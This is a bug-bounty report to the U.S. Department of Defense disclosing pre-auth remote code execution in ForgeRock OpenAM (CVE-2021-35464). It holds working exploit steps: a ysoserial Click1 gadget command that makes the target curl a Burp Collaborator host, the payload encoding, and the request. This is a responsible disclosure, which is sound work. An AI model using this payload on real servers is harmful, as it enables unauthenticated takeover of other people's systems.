HackerOne report H1:1249456 by fdeleite
History: Jul 01, 2021 - 6:21 p.m.

U.S. Dept Of Defense: Pre-auth RCE in ForgeRock OpenAM (CVE-2021-35464)

2021-07-01 18:21:48
fdeleite
hackerone.com

CVSS3: 9.8 High
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: NONE
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH
  Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 10 High
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: NONE
  Confidentiality Impact: COMPLETE
  Integrity Impact: COMPLETE
  Availability Impact: COMPLETE
  Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

EPSS: 0.974 High (percentile 99.9%)

Remote code execution is possible because OpenAM deserializes an attacker-controlled Java object supplied in a request parameter that is handled by the Jato framework bundled with OpenAM; no authentication is required.

Impact

An unauthenticated, third-party attacker can execute arbitrary code on the affected host from the network.

Supporting Material/References

System Host(s)

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

Affected Product(s) and Version(s)

CVE Numbers

CVE-2021-35464

Steps to Reproduce

Target domain: β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

First, build the payload:

  1. Download the ysoserial jar:
     wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar

  2. Generate a Click1 gadget chain whose command calls back to a Burp Collaborator host, prepend a single 0x00 byte to the serialized object, and encode the result as URL-safe base64 with the padding and line breaks stripped, so it fits in a query-string value:
     java -jar ysoserial-master-SNAPSHOT.jar Click1 "curl https://g0h7qcjzwzpzdh2ar6b5f9x3puvkj9.burpcollaborator.net" | (echo -ne \\x00 && cat) | base64 | tr '/+' '_-' | tr -d '=' | tr -d '\n' > payload.txt

Replace the Burp Collaborator hostname with your own before testing. The encoded payload is now saved in payload.txt.

Now send the following request, with XYZ replaced by the contents of payload.txt:

GET /██████████=XYZ HTTP/1.1
Host: 127.0.0.1

The target returns a redirect to AMInvalidURL, but the object has already been deserialized by then and the gadget's command has run.

The response:

HTTP/1.1 302 302
Date: Thu, 01 Jul 2021 18:11:52 GMT
Server: Apache
Set-Cookie: session=expiry=1625163712945691;Max-Age=600;path=/;HttpOnly;Secure;
X-Frame-Options: SAMEORIGIN
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Content-Security-Policy: default-src 'unsafe-inline' 'self'; script-src 'unsafe-eval' 'unsafe-inline' 'self' https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ; img-src 'self' https://β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Cache-Control: private
Location: https://127.0.0.1:443/sso/base/AMInvalidURL
Content-Length: 0
X-XSS-Protection: 1; mode=block

The HTTP request received by the Collaborator (proof that the curl command executed on the target):

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ

Suggested Mitigation/Remediation Actions
